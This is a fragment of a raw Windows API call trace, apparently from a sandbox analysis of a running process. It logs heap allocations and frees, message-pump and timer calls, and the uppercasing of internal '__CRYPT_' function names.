hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0236.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0236.372] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0236.372] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0236.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0236.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0236.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0236.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0236.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0236.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0236.372] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0236.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0236.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0236.431] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0236.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0236.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0236.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0236.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54db8 [0236.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0236.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0236.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0236.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0236.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0236.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54dc8 [0236.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0236.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0236.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0236.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e30 [0236.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0236.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0236.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0236.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0236.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0236.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0236.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0236.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0236.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0236.432] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0236.432] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0236.433] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0236.433] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0236.433] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0236.433] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.433] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.433] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.433] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.434] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.434] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.434] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0236.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0236.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0236.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51028 [0236.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0236.434] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0236.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0236.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04658 [0236.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0236.434] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0236.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04658 | out: hHeap=0x970000) returned 1 [0236.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0236.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51280 [0236.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0236.434] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0236.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0236.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0236.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0236.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0236.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0236.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0236.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0236.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0236.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0236.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0236.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0236.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0236.435] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0236.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0236.435] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0236.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0236.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0236.435] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0236.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0236.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0236.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510a0 [0236.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0236.435] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0236.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0236.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0236.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0236.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0236.435] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0236.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0236.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0236.435] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0236.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0236.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0236.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0236.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0236.436] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0236.436] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0236.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0236.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0236.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0236.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0236.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0236.436] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0236.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0236.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0236.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0236.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0236.436] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0236.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0236.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0236.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0236.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0236.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0236.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0236.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0236.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0236.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0236.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0236.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0236.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0236.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0236.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0236.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0236.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0236.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0236.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0236.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0236.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0236.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0236.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0236.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0236.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0236.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0236.437] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0236.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0236.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0236.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510e8 [0236.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0236.437] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0236.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0236.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0236.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0236.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0236.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0236.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0236.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0236.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0236.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0236.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0236.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0236.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0236.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0236.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0236.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0236.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0236.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0236.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0236.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0236.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0236.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0236.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0236.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0236.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0236.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0236.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0236.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0236.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0236.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0236.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0236.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0236.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0236.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0236.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0236.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0236.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0236.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0236.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0236.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0236.439] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0236.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0236.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0236.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0236.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0236.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0236.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0236.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0236.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0236.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0236.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0236.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0236.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0236.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0236.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0236.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0236.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0236.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0236.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0236.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0236.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0236.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0236.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0236.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0236.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0236.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0236.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0236.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0236.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0236.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0236.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0236.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0236.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0236.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0236.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0236.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0236.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0236.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0236.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0236.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0236.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0236.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0236.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0236.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0236.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0236.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0236.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0236.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0236.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0236.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0236.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0236.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0236.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0236.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0236.441] 